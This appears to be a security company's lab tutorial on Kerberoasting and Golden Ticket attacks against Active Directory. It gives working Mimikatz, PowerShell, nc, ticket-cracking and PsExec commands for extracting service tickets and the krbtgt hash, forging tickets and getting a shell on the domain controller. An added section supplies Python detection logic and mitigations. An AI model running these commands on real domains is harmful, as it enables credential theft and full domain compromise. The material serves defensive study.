Basics of Kerberoasting
Kerberoasting is one of the most common attacks against Active Directory domains. It obtains Kerberos service tickets and cracks the (encrypted) password hash they carry using offline brute-force techniques.
It lets any authenticated domain user request tickets for services from the TGS (ticket-granting service); each ticket is encrypted with the NTLM hash of the plaintext password of the domain user that acts as the service account, so the tickets can be cracked offline.
Before going for the Golden Ticket exploit, let’s walk through an example of Kerberoasting.
If you want, you can set up a Windows machine and join it to a specific domain, which eases communication between the external VM and the base machine; alternatively, take any HTB Windows machine and try the exploits after gaining a user shell.
I would prefer the second one, as I don’t have a heavy configuration.
Mainly, what we do is crack the password offline, since part of the TGS ticket is encrypted with the service account user’s password.
Note that only user accounts with the “servicePrincipalName” attribute set are likely to be exploitable via Kerberoasting.
So earlier, when I told you that you can use the machines on HTB: don’t rely on them, as most of the machines won’t have an SPN set, so I set up a machine of my own with the SPN set by downloading Windows Server 12.
Search for the SPNs that are set using the commands below.
You will have an easier time finding things and exploiting them if you download the PowerSploit tools (“https://github.com/PowerShellMafia/PowerSploit.git“).
Install the PowerView recon folder in the system32 folder, as it is already in the environment path.
Locate Get-NetUser; this will tell you whether an SPN is set or not.
So, for basic enumeration, get the domain information.
Run in PowerShell:
setspn -T dj.com -Q */*
We will request a service ticket for the service we wish to compromise. The domain controller retrieves the permissions from the Active Directory database and creates a TGS ticket, encrypting it with the service account’s password.
As a result, only the service and the domain controller are capable of decrypting the ticket, since those are the only two entities that share the secret.
This requested ticket is stored in memory, from where we extract and crack it.
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/dc-mantvydas.offense.local"
For this we need Mimikatz for the Windows side; download the latest zip from GitHub (“https://github.com/gentilkiwi/mimikatz/releases“).
Open a PowerShell session in the Mimikatz folder matching your Windows architecture (mine is x64, so traverse to that folder) and start Mimikatz with the command below.
This dumps the ticket files, which you can then transfer by drag-and-drop or via nc or an HTTP server, as you wish.
We copied the file to Kali.
Start an nc listener on Kali (saving to a file name of your choice, here ticket.kirbi) and send the file from Windows to Kali.
On Kali: nc -lvnp 6666 > ticket.kirbi
On Windows: nc 192.168.182.129 6666 < $pathtothemimikatzdump***.dj.com.kirbi
Cracking the Kerberos hashes
After transferring the file, crack the .kirbi file with a Python tool; I prefer the Python script “tgsrepcrack.py”, but there are tons of other tools available.
Use the command below to crack it; basically, success in password cracking depends on the wordlist you use. I made a custom wordlist by combining the wordlists that were already present.
This slowed things down a bit; usually, when you don’t know the password, it will take time.
python3 tgsrepcrack.py /usr/share/wordlists/wfuzz/general/common.txt ../[email protected]~dj.com-DJ.COM.kirbi
Alternatively, you can use Invoke-Kerberoast to dump the hash in Hashcat format and then crack it using Hashcat.
Golden Ticket attack
A Golden Ticket attack allows an attacker to forge Kerberos authentication tickets using the hash of the compromised krbtgt service account, with the help of Mimikatz.
This requires a fully authenticated user with admin rights, as with the user we exploited above and gained access as.
To perform this attack the user must be authenticated, since requesting a service or a ticket from the domain checks whether the user is authenticated or not.
Thus, by compromising the KRBTGT account, the attacker can create session tickets forged with the valid krbtgt hash.
This attack assumes a Domain Controller compromise in which the KRBTGT account hash is extracted, which is a requirement for a successful Golden Ticket attack.
Extracting the krbtgt account NTLM hash using Mimikatz.
Mimikatz is already installed, so just use the commands below. We have to gather the domain name, domain SID and KRBTGT hash, which are needed to create the forged TGT.
mimikatz # privilege::debug
mimikatz # lsadump::lsa /inject /name:krbtgt (you can provide a different name)
kerberos::golden /user:cursed /domain:DJ.COM /sid:S-1-5-21-1658281939-3107778392-223560393 /krbtgt:8b6da8753625a156ddda6272b9ce8cb4 /id:500 /ptt
misc::cmd
To confirm, use the klist command, which will show the client user you have just created.
pushd \\WIN-6E7EBF87UMR.dj.com\c$
ls
Alternatively, using the cmd opened earlier through misc::cmd, which connects you to the domain controller, you can download PsExec.exe to connect over the network and gain shell access.
psexec.exe \\169.254.164.158 cmd.exe
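As an added example (not part of the original post), the following Python sketches the defensive side of both techniques described above: it runs two detections over constructed domain-controller security-log records, flagging the bursts of RC4 service-ticket requests that Kerberoasting produces and the service-ticket requests with no preceding TGT request that a forged Golden Ticket leaves behind. The flattened log format and every account, service and address value are constructed for the example.

```python
from collections import defaultdict

# Constructed sample records, not from the original post: a flattened view of
# Windows Security events 4768 (TGT requested) and 4769 (service ticket
# requested) as a DC logs them. EncType 0x17 is RC4-HMAC (keyed from the NTLM
# hash, hence crackable offline); 0x12 is AES256-CTS-HMAC-SHA1-96.
EVENTS = [
    "4768 Account=alice@DJ.COM Client=192.168.182.130 EncType=0x12",
    "4769 Account=alice@DJ.COM Service=WIN-6E7EBF87UMR$ Client=192.168.182.130 EncType=0x12",
    "4768 Account=bob@DJ.COM Client=192.168.182.131 EncType=0x12",
    "4769 Account=bob@DJ.COM Service=svc_sql Client=192.168.182.131 EncType=0x17",
    "4769 Account=bob@DJ.COM Service=svc_http Client=192.168.182.131 EncType=0x17",
    "4769 Account=bob@DJ.COM Service=svc_iis Client=192.168.182.131 EncType=0x17",
    "4769 Account=cursed@DJ.COM Service=WIN-6E7EBF87UMR$ Client=192.168.182.129 EncType=0x12",
]

def parse(line):
    """Split '4769 Key=Value ...' into a dict with the event id under 'id'."""
    event_id, rest = line.split(" ", 1)
    fields = dict(kv.split("=", 1) for kv in rest.split())
    fields["id"] = event_id
    return fields

def kerberoast_suspects(events, min_services=3):
    """Accounts that pull RC4 service tickets for many distinct user-backed
    SPNs: the bulk TGS-REQ pattern behind Kerberoasting. Computer accounts
    (names ending in $) are skipped; their passwords are long and random."""
    rc4_services = defaultdict(set)
    for e in map(parse, events):
        if e["id"] == "4769" and e["EncType"] == "0x17" and not e["Service"].endswith("$"):
            rc4_services[e["Account"]].add(e["Service"])
    return {acct: sorted(svcs) for acct, svcs in rc4_services.items()
            if len(svcs) >= min_services}

def golden_ticket_suspects(events):
    """Accounts presenting a TGT to the DC (4769) that never obtained one from
    it (4768) in the log window: a forged TGT skips the AS exchange entirely.
    Caveat: TGTs live up to 10 hours and may come from another DC, so widen
    the window and correlate across all DCs before acting on a hit."""
    have_tgt = set()
    flagged = set()
    for e in map(parse, events):
        if e["id"] == "4768":
            have_tgt.add(e["Account"])
        elif e["id"] == "4769" and e["Account"] not in have_tgt:
            flagged.add(e["Account"])
    return sorted(flagged)

if __name__ == "__main__":
    print("Kerberoasting candidates:", kerberoast_suspects(EVENTS))
    print("Golden Ticket candidates:", golden_ticket_suspects(EVENTS))
```

The RC4 indicator goes away once service accounts are limited to AES via msDS-SupportedEncryptionTypes (or moved to gMSAs), which also removes the offline-cracking path itself; the Golden Ticket indicator remains valid only while the krbtgt password has not been rotated twice after a suspected compromise.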
Payatu is a research-focused, CERT-In empanelled cybersecurity consulting company specializing in security assessments of IoT product ecosystems, web applications and networks, with a proven track record of securing applications and infrastructure for customers across 20+ countries.